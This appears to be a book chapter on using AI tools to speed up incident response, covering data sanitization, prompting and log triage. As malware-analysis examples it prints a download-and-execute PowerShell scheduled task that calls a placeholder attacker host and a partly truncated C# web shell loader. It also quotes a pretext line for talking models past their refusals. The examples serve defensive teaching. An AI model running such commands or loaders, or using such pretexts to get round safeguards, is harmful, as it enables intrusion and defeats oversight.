1. Accelerating Incident Response with AI

Introduction

As I write this chapter at the beginning of 2026, the cybersecurity industry is rapidly adopting and deploying AI tools. The AI hype cycle is pervasive, with near-daily major announcements and claims from frontier model providers, cloud SaaS providers, and security vendors about integrating AI capabilities into their platforms. Products enter the market with fanfare, then quietly exit months later when expectations fail to match reality and users find limited practical value.

Many of the deployments I see are a reaction to AI hype and leadership demands to integrate platforms and services with AI technology, without considering whether these tools actually deliver value to users. Further, in my penetration testing work, I find that many of these deployments lack appropriate safeguards against various attacks and fail to ensure that AI-generated content is accurate and defensible.

However, AI tools are also demonstrating significant value in accelerating incident response analysis when applied thoughtfully by skilled analysts.

This chapter will examine the practical applications of generative AI in accelerating common incident response tasks. The focus is on immediate, actionable techniques that analysts can apply to real investigations rather than theoretical possibilities or inaccessible market hype. The goal is to help incident responders leverage AI capabilities effectively while understanding the associated risks and limitations of these platforms.

AI Costs and Access

In this chapter, we’ll look at several examples of how AI can accelerate incident response tasks. Wherever possible, I’ve focused on techniques that use publicly accessible AI platforms at minimal cost. Many of the examples use public frontier models from providers such as OpenAI, Anthropic, Google, and Microsoft.

These platforms often offer a free tier that allows analysts to experiment with AI capabilities without incurring costs. However, free tiers impose usage quotas that real incident response workloads will likely exhaust quickly.

For sustained use, organizations will need to budget for access to an AI platform. This can be in the form of subscription plans, per-use API fees, or infrastructure costs for hosting open-weight models locally. Costs vary widely based on the specific platform, usage volume, and deployment approach.

Organizations should evaluate the cost-benefit tradeoffs of different AI deployment options based on their incident response needs, data sensitivity, and budget constraints. Start by experimenting with the free tier to understand the potential value and usefulness before committing to paid plans or infrastructure investments.

Opportunities and Cautions

AI models demonstrate capabilities that directly address common bottlenecks in incident response workflows. Pattern recognition allows models to identify anomalies in log data, network traffic, or system behavior that analysts might overlook during manual review. Information synthesis combines data from multiple sources into coherent insights, reducing the cognitive load on analysts working with data from dozens of disparate systems. Models break complex technical problems into manageable components through abstraction, helping analysts approach challenging analysis tasks systematically. They process large volumes of text-based data far faster than human analysts can. Finally, they translate technical findings into language appropriate for different audiences (executives, key stakeholders, end users, etc.) without requiring analysts to maintain multiple report versions.

These capabilities can meaningfully reduce Mean Time to Respond (MTTR) during active incidents. Tasks that previously required hours or days of manual analysis can often be completed in minutes with AI assistance.

Table 1. AI Capabilities and Limitations
Capability            | How It Helps                                                     | Limitation to Consider
----------------------|------------------------------------------------------------------|--------------------------------------------------------------------
Pattern recognition   | Identifies anomalies in logs, traffic, and system behavior       | May generate false patterns in noisy data or miss subtle indicators
Information synthesis | Combines findings from multiple sources into coherent narratives | Can misinterpret relationships between events or draw incorrect conclusions
Abstraction           | Breaks complex problems into manageable components               | May oversimplify nuanced situations requiring expert judgment
Rapid processing      | Analyzes large volumes of text-based data quickly                | Speed does not guarantee accuracy; verification remains essential
Translation           | Converts technical findings for different audiences              | May omit critical details or use inappropriate tone without review

These opportunities come with important cautions. For example, AI models generate incorrect information with the same confidence they display when providing accurate information. These hallucinations introduce significant risk to the incident response process when AI-generated findings are accepted without verification.

IMPORTANT: Hallucinations in Large Language Models (LLMs) are a well-known problem that continues to challenge even the most advanced models. Because models present incorrect information with confidence, it is difficult for users to identify when output is inaccurate.

Further, AI models are typically non-deterministic: the same prompt can produce different results each time the model is asked to solve a task. This variability can be valuable, enabling the exploration of multiple perspectives on a problem. However, it also complicates validation, because findings that cannot be reproduced by re-running the same prompt are harder to verify independently.

Sharing incident data with commercial AI platforms also raises data handling concerns that may conflict with regulatory requirements or organizational policies. Organizations operating under strict compliance frameworks may find commercial AI platforms incompatible with their compliance obligations.

Training cutoff dates mean models lack current threat intelligence and may reference deprecated tools or outdated techniques. If the analyst does not recognize that the model’s knowledge is stale, they may accept recommendations that are no longer valid. Analysts should verify that recommended approaches remain current and applicable.

Recognizing these concerns, some organizations have banned AI platforms entirely. Even where organizational policy permits AI use, analysts should approach AI-assisted analysis with appropriate skepticism and verification practices. The goal in applying AI to incident response is to accelerate response time while mitigating the risks of incorrect or misleading outputs and data disclosure.

Data Handling Considerations

Before using AI tools with incident data, analysts should understand the data handling implications of different model types and deployment options.

Frontier Models

Commercial providers such as OpenAI, Anthropic, Google, and Microsoft offer the most capable AI systems. These frontier models demonstrate strong performance on code analysis, log interpretation, and report generation. Using frontier models requires sending data to external servers. Business and enterprise agreements with these providers typically include provisions that customer data will not be used for model training. [1]

However, even with no-training policies, prompt data may still be stored for quality assurance, abuse prevention, or logging purposes. This may be an unacceptable risk for decision-makers, given the sensitivity of incident data. Analysts should review the specific terms of service and data-handling policies for any AI platform used with incident data, and discuss the risks and opportunities of using commercial models with organizational decision-makers.

Open-Weight Models

Models such as DeepSeek, Meta’s Llama, or Microsoft’s Phi can be deployed locally, keeping all data within organizational control. Hosting open-weight models locally mitigates data exposure risks associated with commercial platforms, but requires significant technical resources to deploy and maintain. Server hardware with GPUs capable of running these models is expensive, and ongoing maintenance is required to keep models updated and running smoothly.

Some organizations choose to host open-weight models in cloud environments they control, balancing data protection with reduced infrastructure management overhead. While still exposing data to cloud providers, this approach avoids sharing data with third-party AI platform providers and may better align with organizational policies, especially when the organization already uses cloud infrastructure for other sensitive workloads.

In general, open-weight models offer less capability than frontier models. This is subject to some debate, as open-weight models continue to improve rapidly, and offer extensibility and transparency that commercial models lack. However, many open-weight models still lag behind frontier models in code analysis, log interpretation, and complex reasoning tasks, reducing the value of the opportunity in exchange for the data protection benefits.

Table 2. Comparison of AI Deployment Options
Factor           | Commercial Frontier Models                                       | Open-Weight Models (Cloud)                              | Open-Weight Models (Local)
-----------------|------------------------------------------------------------------|---------------------------------------------------------|----------------------------------------------------
Capability       | Highest performance on complex tasks                             | Moderate performance, improving rapidly                 | Moderate performance, improving rapidly
Data handling    | Data sent to external provider                                   | Data sent to cloud provider                             | All data remains on organizational infrastructure
Cost model       | Per-use API fees                                                 | Compute costs for hosting                               | Infrastructure investment and ongoing compute
Setup complexity | Minimal - use web interface or API                               | Moderate - requires cloud deployment                    | High - requires local infrastructure and expertise
Best for         | Organizations comfortable with commercial data handling policies | Organizations needing privacy with cloud infrastructure | Highly regulated environments

The choice between deployment options depends on organizational risk tolerance, regulatory requirements, technical capability, and budget. Many organizations adopt a hybrid approach, using commercial models for less-sensitive analysis and local models for regulated data.

When using commercial AI platforms with incident data, analysts can apply sanitization techniques to reduce exposure of sensitive information. Real IP addresses can be replaced with RFC 5737 TEST-NET documentation addresses such as 192.0.2.0/24, 198.51.100.0/24, or 203.0.113.0/24. Actual domain names can be substituted with example domains like example.com, example.net, or example.org. Personally identifiable information, credentials, and API keys should be redacted before including data in prompts. Organization names and employee identities can be anonymized, provided that this does not interfere with the analysis.

RFC 5737 documentation addresses are reserved for use in examples and documentation. Think of them like the fake 555 phone numbers (401-555-2911) used in movies. Whereas RFC 1918 addresses are assigned to real private networks, RFC 5737 addresses are never assigned to real systems, making them safe to use for data sanitization.

These sanitization techniques reduce risk but do not eliminate it entirely. Patterns in sanitized data may still reveal information about infrastructure, architecture, or organizational practices. Analysts should verify that sanitization is appropriate for the incident’s sensitivity level.
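
A minimal sanitization pass can be scripted so substitutions are applied consistently and can be reversed after analysis. The sketch below swaps real IPv4 addresses for RFC 5737 TEST-NET-1 addresses and real domains for example.com subdomains; the regexes are illustrative, not exhaustive.

```python
import re

# Illustrative patterns only: a production sanitizer would also handle IPv6,
# URLs, email addresses, hostnames, credentials, and API keys.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?!example\.)(?:[a-z0-9-]+\.)+(?:com|net|org|tld)\b")

def sanitize(text: str) -> tuple[str, dict]:
    """Replace each unique IP/domain consistently and return the mapping
    so the analyst can reverse the substitution after analysis."""
    mapping = {}

    def map_ip(match):
        ip = match.group(0)
        if ip not in mapping:
            # 192.0.2.0/24 is reserved for documentation (RFC 5737)
            mapping[ip] = f"192.0.2.{len(mapping) + 1}"
        return mapping[ip]

    text = IPV4_RE.sub(map_ip, text)

    def map_domain(match):
        dom = match.group(0)
        if dom not in mapping:
            mapping[dom] = f"host{len(mapping) + 1}.example.com"
        return mapping[dom]

    return DOMAIN_RE.sub(map_domain, text), mapping
```

The returned mapping lets the analyst translate the model’s findings back to the real infrastructure after the analysis is complete.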

IMPORTANT: Data sanitization is a complex field of study, with significant risks and trade-offs. Deanonymization attacks can re-identify sanitized data by correlating patterns with known information. A notable example of this technique is the deanonymization of the Netflix Prize dataset, demonstrating the risks of correlating public and anonymized data. [2] Organizations should consider that even anonymized data may still pose risks when shared with external AI platforms.

The decision between commercial and local models involves trade-offs between capability, convenience, and data protection requirements. Organizations should establish clear policies about what incident data can be shared with external AI platforms and under what circumstances.

Chapter Organization

This chapter progresses from simple to complex use cases for accelerating incident response activities using AI. Prompting foundations introduce techniques for effective interaction with AI models, establishing the communication patterns that make AI assistance productive. Foundational use cases cover web-based AI tools for code analysis, log review, and stakeholder communication that analysts can begin using immediately. Intermediate use cases explore structured prompts for playbook generation and report drafting, demonstrating how reusable templates accelerate recurring tasks. Advanced use cases examine automation through Model Context Protocol (MCP) integration and workflow orchestration for teams ready to embed AI into security operations infrastructure. Operational considerations address verification, documentation, and ongoing practice to ensure AI assistance remains reliable and defensible.

Each section builds on previous concepts. Analysts can start with straightforward applications and progress to more sophisticated integrations as comfort and organizational readiness permit. The techniques described work with current AI capabilities, but the underlying principles (clear communication, verification, appropriate use) will remain relevant as AI technology evolves.

Prompting Foundations

Prompting describes the process of crafting and refining the instructions given to AI models to produce useful, accurate output. Working effectively with LLMs requires understanding how to communicate intent clearly, as poorly defined prompts tend to yield less useful or misleading results.

Quick Prompting Tips

The following techniques improve the quality of AI output for incident response tasks. These approaches can be used independently or combined for more complex requests. Mastering these foundational techniques enables analysts to obtain useful results from AI models without requiring a deep understanding of model architecture or training methods.

Table 3. Quick Prompting Techniques for Incident Response
Technique                            | Example
-------------------------------------|-------------------------------------------------------------------------------------------
Iterative prompting                  | Start broad, then refine: "Explain this code." → "Focus on the network communication functions." → "Summarize for a non-technical audience in three sentences."
Use delimiters                       | "Analyze the log entries delimited by triple quotes below." Delimiters help models distinguish instructions from data.
Request structured output            | "Return findings as a JSON array with keys: timestamp, finding, severity, recommendation."
Assign a role                        | "You are a cybersecurity incident response analyst with expertise in Windows forensics and malware analysis."
Use Chain of Thought (CoT) reasoning | "Think step-by-step about how this attack progressed through the environment before summarizing your findings."
Ask what’s needed                    | "I want to analyze this log file for signs of credential theft. What information do you need from me to help with this analysis?"

ChatGPT conversation showing a credential theft analysis prompt with an uploaded JSON sign-in log file
Figure 1. ChatGPT Prompt for Log File Analysis

Iterative prompting is particularly valuable for refining AI output and learning how to interact with models effectively. Initial AI output rarely matches exactly what the analyst needs. Effective use of AI involves reviewing output, identifying what additional refinement would improve it, and issuing follow-up prompts that build on previous responses. This conversational approach often yields better results than crafting a single comprehensive prompt.

Analysts should experiment with these techniques on low-stakes tasks before applying them to active investigations. Practicing effective prompting during quiet periods builds skills that become valuable during time-sensitive incidents.

Structured Prompts for Complex Tasks

Simple prompts of one or two sentences work well for straightforward requests. More sophisticated tasks benefit from structured prompts that provide explicit guidance across multiple dimensions. These structured prompts can be saved, refined over time, and reused as part of standard workflows. More complex prompts are often used for AI platform integration, guiding the model to produce the desired output that meets a specific application’s needs.

Structured prompts typically include several elements that shape the model’s thinking toward a desired output format and structure:

  • Role and objective sections set expectations for the model’s persona and mission, helping to frame the appropriate level of technical depth and perspective.

  • Instructions and constraints provide explicit guidance on what to do and what to avoid, reducing ambiguity that might lead to off-topic responses.

  • Reasoning steps invoke chain-of-thought processing for complex analysis, encouraging the model to work through problems systematically rather than jumping to conclusions.

  • Output format definitions ensure consistency across multiple uses of the same prompt, making results easier to compare and integrate into workflows.

  • Examples show the model what good output looks like, significantly improving quality through one-shot or few-shot learning (providing one or a few examples to guide the model’s behavior).

  • Context sections include relevant background information that the model would not otherwise have access to.

  • Summary sections reiterate key constraints to address recency bias, which can lead models to give disproportionate weight to information at the end of prompts.

Structured prompts often use Markdown formatting with headers to help the model parse directions effectively. For complex content within prompts, XML-style tags can differentiate instructions from data, as shown in the example in Listing 1.

Listing 1. Structured Prompt for IOC Extraction
# Task
Extract indicators of compromise from the threat report below.

<report>
This report details adversaries deploying novel AI-enabled malware in active operations. APT28 (FROZENLAKE) deployed PROMPTSTEAL malware against Ukraine using Hugging Face API to query Qwen2.5-Coder-32B-Instruct LLM for command generation. VirusTotal hash: 766c356d6a4b00078a0293460c5967764fcd788da8c1cd1df708695f3a15b777

UNC1069 (MASAN) conducted cryptocurrency theft campaigns researching wallet locations and credential extraction. TEMP.Zagros exposed their C2 domain malicious-c2.example.com and encryption keys while requesting help with encrypted C2 scripts. APT42 developed phishing campaigns targeting think tanks using translation assistance and data processing agents.
</report>

# Output Requirements
- File hashes (MD5, SHA1, SHA256)
- Domain names and IP addresses
- Malware family names
- Threat actor identifiers

Format as a table with columns: Indicator Type, Value, Associated Threat Actor
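
Because models can hallucinate or silently drop indicators, AI-extracted IOCs benefit from a deterministic cross-check. A simple regex pass, sketched below with deliberately narrow, illustrative patterns, provides ground truth to compare against the model’s table:

```python
import re

# Narrow, illustrative patterns: SHA256 hashes and lowercase domain names.
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")

def extract_iocs(report: str) -> dict:
    """Deterministic extraction pass to cross-check AI-generated IOC tables."""
    return {
        "sha256": set(SHA256_RE.findall(report)),
        "domains": set(DOMAIN_RE.findall(report)),
    }
```

Any indicator found by the regexes but missing from the AI output, or vice versa, warrants a second look before the results go into a report.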

Developing effective structured prompts requires iteration. Start without examples and refine based on output. Manually edit the best output to match the desired format, then use the edited version as an example in subsequent prompts. Consider developing a library of saved and refined prompts for common incident response tasks, treating them as reusable tools alongside scripts and detection rules.

Version control systems like Git work well for managing prompt libraries. Teams can track prompt evolution, share improvements, and maintain different versions for different AI platforms or use cases.
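
As a concrete sketch of a prompt-library entry, a saved prompt can be stored as a parameterized template and rendered per incident. The placeholder name and file layout here are assumptions, not a standard:

```python
from string import Template

# A saved, parameterized structured prompt. In practice this string would
# live in a version-controlled file in the team's prompt library.
IOC_EXTRACTION_PROMPT = Template("""\
# Task
Extract indicators of compromise from the threat report below.

<report>
$report
</report>

# Output Requirements
- File hashes (MD5, SHA1, SHA256)
- Domain names and IP addresses

Format as a table with columns: Indicator Type, Value
""")

def render_prompt(report_text: str) -> str:
    # safe_substitute leaves stray $ characters in the report text untouched
    return IOC_EXTRACTION_PROMPT.safe_substitute(report=report_text)
```

Stored as a file under version control, the template can be diffed, reviewed, and improved like any other team tool.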

Foundational Use Cases

Next, let’s look at several foundational use cases that demonstrate opportunities to accelerate incident response using AI through standard web interfaces from providers like OpenAI, Anthropic, or Google. These approaches require no special integration or technical setup beyond access to a commercial generative AI platform. Analysts can begin applying these techniques immediately to accelerate analysis tasks and improve productivity.

Many commercial AI platforms offer a free tier that allows analysts to experiment with capabilities without incurring costs. Alternatively, open-weight models can be hosted locally or in cloud environments under organizational control when data privacy requirements preclude the use of commercial platforms.

Code Analysis and Deobfuscation

Incident responders frequently encounter unfamiliar code during investigations: malware samples, attacker scripts, persistence mechanisms, and exploitation tools. Understanding what this code does is essential for scoping, containment, and eradication, but not every analyst has expertise in every programming language attackers might use.

AI models excel at explaining code in plain language, making this capability immediately valuable for incident response. The model can describe what code does, identify malicious functionality, and decode obfuscated content that would require significant manual effort to analyze.

Analyzing Obfuscated PowerShell

Consider a scenario in which an analyst discovers a suspicious scheduled task during an investigation, as shown in Listing 2. The task executes PowerShell with parameters that are not immediately clear:

Listing 2. Windows Scheduled Task Command Runs PowerShell
schtasks /create /tn "Windows Security Audit" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"IEX ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://attackerc2.tld/payload.ps1' -UseBasicParsing).Content))\"" /sc onevent /ec Security /mo "*[System[EventID=4625]]" /ru SYSTEM /f

An analyst can provide this command to an AI model with a prompt requesting a plain-language explanation, as shown in the example in Listing 3.

Listing 3. Code Analysis Prompt
Explain what the Windows command in the triple-backtick block below does. Identify any malicious or suspicious functionality. Break down each component of the command and explain its purpose.

```
schtasks /create /tn "Windows Security Audit" /tr "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"IEX ([System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -Uri 'http://attackerc2.tld/payload.ps1' -UseBasicParsing).Content))\"" /sc onevent /ec Security /mo "*[System[EventID=4625]]" /ru SYSTEM /f
```

Using Google Gemini, the model provides the analysis shown in Figure 2, explaining that the command creates a scheduled task that runs a hidden PowerShell script whenever a failed login event occurs.

Google Gemini response identifying persistence and lateral movement indicators in Windows scheduled task commands
Figure 2. Google Gemini Analysis of Schtasks and PowerShell Commands

This command is a classic example of persistence and lateral movement techniques used by attackers. It schedules a task that triggers automatically when a specific security event occurs.

The most suspicious aspect is that it monitors for failed login attempts to execute a hidden payload from a remote server with the highest possible system privileges.

Suspicious & Malicious Indicators

Remote Payload Execution: It uses IEX (Invoke-Expression) to download and run a script directly from a suspicious URL (attackerc2.tld). This is a common "fileless" malware technique.

Privilege Escalation: The task runs as SYSTEM, giving the attacker full control over the machine.

Stealth: It uses the -WindowStyle Hidden flag to ensure the user never sees a PowerShell window pop up.

Event Triggering: By triggering on Event ID 4625 (Failed Login), the attacker can effectively "summon" the malware remotely just by attempting to log in with a wrong password.

This analysis, which might take an experienced analyst several minutes to perform manually, can be completed in seconds with AI assistance. The analyst can then ask follow-up questions to explore specific aspects, such as the significance of triggering on Event ID 4625, how to detect this scheduled task using PowerShell, or what artifacts this would leave on the system.

For less experienced analysts, AI code analysis provides a way to understand unfamiliar programming languages and techniques without requiring deep expertise in every language attackers might use. The AI platform also serves as a teaching tool, allowing analysts to learn new techniques and languages through guided exploration after the initial analysis.

Verification Is Non-Negotiable

AI code analysis provides valuable acceleration but requires verification before acting on findings or documenting them as factual conclusions.

Models can misidentify functions, incorrectly describe behavior, or miss important details. A model might confidently state that code performs one action when it actually performs a different one. These hallucinations appear authoritative, making them particularly dangerous if accepted without verification.

Analysts should verify the analysis provided by AI models:

  • Cross-reference AI explanations with official documentation for APIs and commands.

  • Use different AI platforms to compare findings, reducing the risk of model-specific hallucinations and other errors.

  • Test code behavior in isolated environments when safe to do so.

  • Treat AI analysis as a starting point for investigation, not a final conclusion.

Never use unverified AI output for legal documentation, regulatory attestations, or communications where accuracy has material consequences. AI accelerates analysis; human verification is required to ensure accuracy.

Iterative Analysis for Complex Artifacts

More complex code samples benefit from iterative prompting. Start with a general explanation request, then drill into specific functions, decode encoded content, or request analysis from particular perspectives such as detection, eradication, or hunting for similar artifacts.

When analyzing malware with payloads, an analyst might begin with an initial prompt asking the model to explain the code’s overall behavior. A follow-up prompt can ask the model to decode Base64 content from a specific variable and explain what it contains. Subsequent prompts might ask what network indicators could be used to detect this malware, or request a summary of findings for a non-technical audience. Each iteration builds context from previous responses, allowing deeper analysis without re-explaining the entire artifact. The conversational nature of AI interactions naturally supports this progressive refinement.
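
When working through an API rather than a web interface, this progressive refinement amounts to maintaining a growing message history. The sketch below uses the role/content message format common to several chat APIs (an assumption; adapt to your platform), with a placeholder standing in for the real API call:

```python
def send_to_model(messages):
    # Placeholder: a real implementation would call the platform's chat API
    # with the full history so the model sees all prior context.
    return f"[analysis of: {messages[-1]['content']}]"

def iterate(history, followup):
    """Append a follow-up prompt and the model's reply so each turn
    builds on everything said before."""
    history.append({"role": "user", "content": followup})
    reply = send_to_model(history)
    history.append({"role": "assistant", "content": reply})
    return reply

# Each call deepens the analysis without re-explaining the artifact.
history = [{"role": "system", "content": "You are an incident response analyst."}]
iterate(history, "Explain this code's overall behavior.")
iterate(history, "Decode the Base64 content in the payload variable.")
iterate(history, "What network indicators could detect this malware?")
```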

For example, consider a C# malware sample that includes obfuscated encoding and payloads, as shown in the example in Listing 4.

Listing 4. C# Malware Sample with Obfuscation
void Page_Load(object sender, EventArgs e)
{
    string p = "42a9798b99d4afcec9995e47a1d246b98ebc96be7a732323eee39d924006ee1d";
    string r = Request.Form["data"];
    // Obfuscated assembly bytes, approximately 1 KB, removed for brevity
    byte[] a = {0x79,0x68,0xf1,0x39,0x34,0x39,0x38,0x62,0x3d,0x39,0x64,0x34,0x9e,0x99,0x63,0x65,0xdb,0x39,0x39,0x39,0x35,0x65,0x34,0x37,0x21,0x31,0x64,0x32,0x34,0x36,0x62,0x39,0x38,0x65,0x62,0x63,0x39,0x36,0x62,0x65,0x37,0x61,0x37,0x33,0x32,0x33,0x32,0x33,0x65,0x65,0x65,0x33,0x39,0x64,0x39,0x32,0x34,0x30,0x30,0x36,0xe5,0x65,0x31,0x64,0x3a,0x2d,0xdb,0x37,0x37,0x8d,0x31,0xaf,0x18,0x81,0x65,0x78,0xac,0x47,0x37,0xd,0xa,0x4a,0x19,0x49,0x47,0xa,0x53,0x45,0x0,0x5c,0x44,0x51,0x55,0x58,0xc,0x56,0x4c,0x45,[...],0x30,0x36,0x65,0x65,0x31,0x64};
    for(int i = 0; i < a.Length; i++) a[i] ^= (byte)p[i % p.Length];
    Assembly aS = Assembly.Load(a);
    object o = aS.CreateInstance("SharPy");
    MethodInfo mi = o.GetType().GetMethod("Run");
    object[] iN = new object[] {r, p};
    object oU = mi.Invoke(o, iN);
    Response.Write(oU);
}

Using ChatGPT or another AI platform, the analyst can iteratively explore this code. After attaching the code as a file, I used an initial prompt to request a high-level explanation of what the code does, as shown in Figure 3. ChatGPT returned an overview of the functionality, including insight into the large block of bytes declared as an array a.

ChatGPT explaining uploaded C# code as ASP.NET code-behind that executes on every page request
Figure 3. Code Analysis Prompt for C# Malware

4) It defines a giant blob of bytes (encrypted payload or lookup table)

byte[] a = { 0x79, 0x68, 0xf1, 0x39, … };

This enormous byte array is almost certainly not legitimate application code. Patterns here strongly suggest:

  • encrypted/compressed data embedded in source

  • or an obfuscated second-stage payload

  • or a keyed decoding table

  • or "dead drop" data that gets transformed + executed

This is exactly the kind of thing you see in a web shell loader: keep the real logic hidden inside a blob so casual review doesn’t reveal it.

ChatGPT provides valuable insight for the analyst, suggesting we may be seeing a web shell loader. However, it doesn’t give us the specifics of what the obfuscated payload does. Using iterative prompting techniques, a follow-up prompt can ask the model to analyze how the byte array a is used in the code, as shown in Figure 4.

ChatGPT follow-up response identifying XOR-obfuscated .NET assembly embedded as byte array in the C# script
Figure 4. Follow-up Prompt for C# Malware Analysis

What the decrypted bytes actually are

If you apply the XOR step, the resulting byte stream starts with the classic Windows PE header:

bytes 0-1 become MZ

and inside it contains the standard .NET metadata marker (BSJB) and framework string like v2.0.50727. That’s how you know this is a real .NET assembly, not random noise.

What that embedded assembly appears to do

When you inspect the decrypted assembly’s embedded strings, you see identifiers like:

  • runtime_compiler_xor.dll

  • SharPy

  • Xor_Enc_Dec

  • FromBase64String

  • Microsoft.CSharp

  • CSharpCodeProvider

  • System.CodeDom.Compiler

  • CompileAssemblyFromSource

  • System.Reflection

Those are a pretty specific combo: it’s set up to accept code/content at runtime, decode/decrypt it (Base64 + XOR), compile it (CodeDom / CSharpCodeProvider), then execute it via reflection.
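
The model’s claims about the decoded payload are easy to verify independently, because the decoding loop in Listing 4 is trivial to reproduce. Since the byte array in the listing is truncated, the sketch below round-trips a stand-in payload to demonstrate the XOR step:

```python
def xor_decode(data: bytes, key: str) -> bytes:
    """Reproduce the decoding loop from Listing 4: each byte is XORed
    with the corresponding byte of the repeating key string."""
    return bytes(b ^ ord(key[i % len(key)]) for i, b in enumerate(data))

# XOR is its own inverse, so encoding and decoding are the same operation.
# The key is the string p from Listing 4; the payload is a stand-in.
key = "42a9798b99d4afcec9995e47a1d246b98ebc96be7a732323eee39d924006ee1d"
sample = b"MZ\x90\x00" + b"stand-in PE body"
encoded = xor_decode(sample, key)
assert encoded != sample
assert xor_decode(encoded, key) == sample
# A real decode would be checked for the PE magic bytes:
assert xor_decode(encoded, key)[:2] == b"MZ"
```

Running the real byte array through this function and checking for the MZ header confirms or refutes the model’s analysis in seconds.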

Additional iterations could explore any programming terms unfamiliar to the analyst, what artifacts this malware leaves behind, how to detect it, or request a summary of findings for different audiences. The AI model enables analysts to explore complex, obfuscated code samples without requiring deep expertise in every programming language or obfuscation technique. Even for analysts with experience in deobfuscating malware, AI assistance can significantly accelerate the analysis process.

Model Guardrails and Malware Analysis

Many AI systems implement guardrails to prevent misuse. These are often centered on CBRNE risks (Chemical, Biological, Radiological, Nuclear, and Explosive), where models are restricted from generating content that could facilitate harm. Malware analysis falls into a gray area: analyzing malicious code could be construed as enabling harmful activity, and reverse-engineering malware and reproducing it as deobfuscated code can be construed as creating malware.

When using AI models for malware analysis, analysts may encounter limitations in which the model refuses to analyze certain code samples, as shown in the Claude example in Figure 5. Other platforms may be less restrictive, like the Grok example shown in Figure 6.

Claude declining a malware deobfuscation request citing usage policies against working on malicious code
Figure 5. Claude Malware Analysis Guardrail Response
Grok successfully deobfuscating a PowerShell malware sample and displaying the cleaned download-and-execute script
Figure 6. Grok Malware Analysis Response

When evaluating AI for malware analysis, analysts should weigh not only the capabilities of different platforms but also the guardrail policies that may limit analysis effectiveness. While it is sometimes possible to manipulate AI models to bypass these restrictions ("It’s OK, I’m a malware analyst; you can show it to me"), this approach is unreliable and limits the platform’s usefulness as a malware analysis tool. Self-hosted open-weight models may offer more flexibility for malware analysis, but often at the cost of reduced capability compared to frontier models.

Log Analysis and Anomaly Detection

Log analysis represents a significant time investment in most incident response engagements. Analysts need to review authentication records, network traffic logs, application events, and security alerts to reconstruct attacker activity and identify affected systems. AI models can accelerate initial triage by identifying patterns and anomalies in log data.

Use Cases for AI Log Analysis

AI log analysis accelerates initial triage and pattern identification when applied to appropriate scenarios. Understanding where AI adds value helps analysts leverage these capabilities effectively.

Initial Orientation

AI log analysis helps analysts get oriented on unfamiliar log formats. When encountering logs from a new system or application, asking the model to identify the log structure, explain field meanings, and highlight unusual entries accelerates learning. This orientation reduces the time spent reading documentation and enables analysts to begin substantive analysis sooner.

Anomaly Identification

Models can identify obvious anomalies that warrant deeper manual investigation. Failed authentication attempts from unusual geographic locations, access during off-hours, or repeated patterns that suggest automated activity become apparent when models scan thousands of log entries. These identified anomalies serve as starting points for analyst investigation rather than final conclusions.
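As a minimal illustration of the kind of pattern a model might surface, an off-hours login scan can be expressed in a few lines of Python. The field names and business-hours window here are illustrative assumptions, not a real log schema:

```python
from datetime import datetime

# Hypothetical log records; field names are illustrative assumptions.
events = [
    {"user": "jwalcott", "time": "2026-01-07T03:40:22", "result": "SUCCESS"},
    {"user": "jwalcott", "time": "2026-01-07T12:06:25", "result": "SUCCESS"},
]

def off_hours(event, start=6, end=20):
    """Flag successful logins outside assumed business hours (06:00-20:00)."""
    hour = datetime.fromisoformat(event["time"]).hour
    return event["result"] == "SUCCESS" and not (start <= hour < end)

anomalies = [e for e in events if off_hours(e)]  # flags the 03:40 login
```

As with AI-identified anomalies, a hit from a heuristic like this is a starting point for investigation, not a conclusion.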

Report Preparation

Formatting and summarizing log findings for reports represents an appropriate use of AI assistance. Models can transform raw log excerpts into tables, timelines, or narrative summaries suitable for different audiences. Analysts should verify that summaries accurately represent the underlying data before including them in formal documentation.

Query Generation

AI models can generate queries for SIEM platforms from natural-language descriptions. An analyst can describe what they want to find in plain language, and the model can suggest appropriate query syntax for platforms such as Splunk, Sentinel, or Chronicle. Generated queries should be reviewed and tested before execution to ensure they return expected results.
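Because a generated query can be wrong or even destructive, a lightweight sanity check before execution is prudent. The sketch below screens a generated Splunk SPL string for risky commands; the command list is an illustrative assumption and not a complete safeguard:

```python
RISKY_COMMANDS = {"delete", "collect", "outputlookup", "sendemail"}  # illustrative, not exhaustive

def review_spl(query: str) -> list[str]:
    """Return any risky SPL commands found in a generated Splunk query."""
    findings = []
    for segment in query.split("|"):
        command = segment.strip().split(" ")[0].lower()
        if command in RISKY_COMMANDS:
            findings.append(command)
    return findings

generated = 'index=auth action=failure | stats count by src_ip | delete'
warnings = review_spl(generated)  # flags "delete" for human review
```

A check like this supplements, not replaces, manual review and testing of generated queries in a non-production index.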

Initial Log Triage: Microsoft 365 Authentication Logs

When presented with unfamiliar log data, an analyst can upload or paste the log content, then use a prompt to summarize activity or identify events of interest. For example, using a Microsoft 365 access log (exported as JSON) and Claude Opus, we prompted the model to identify events of interest (EOI), as shown in Figure 7.

Claude prompt requesting Microsoft 365 sign-in log analysis for evidence of intrusion with attached JSON file
Figure 7. Log File Analysis Prompt

The model analyzed the structure and content of the log entries, identifying several anomalies, as shown in Figure 8 and summarized in Table 4.

Claude analysis results showing password spray findings table with compromised account and suspicious admin activity
Figure 8. Log File Analysis Response
Table 4. Microsoft 365 Authentication Log Analysis Summary
| Timestamp (UTC) | IP Address      | ASN            | Location     | App               | Result  |
|-----------------|-----------------|----------------|--------------|-------------------|---------|
| 02:51:01        | 3.12.217.120    | 16509 (AWS)    | Columbus, OH | Microsoft Office  | FAIL    |
| 03:35:24        | 3.12.217.149    | 16509 (AWS)    | Columbus, OH | Azure PowerShell  | FAIL    |
| 03:37:10        | 44.210.66.209   | 14618 (AWS)    | Ashburn, VA  | Authenticator App | FAIL    |
| 03:38:14        | 3.15.35.2       | 16509 (AWS)    | Columbus, OH | Azure CLI         | FAIL    |
| 03:39:18        | 3.15.35.215     | 16509 (AWS)    | Columbus, OH | Visual Studio     | FAIL    |
| 03:40:22        | 3.12.216.177    | 16509 (AWS)    | Columbus, OH | Azure CLI         | SUCCESS |
| 12:06:25        | 173.166.135.199 | 7922 (Comcast) | Columbia, MD | Edge Browser      | SUCCESS |
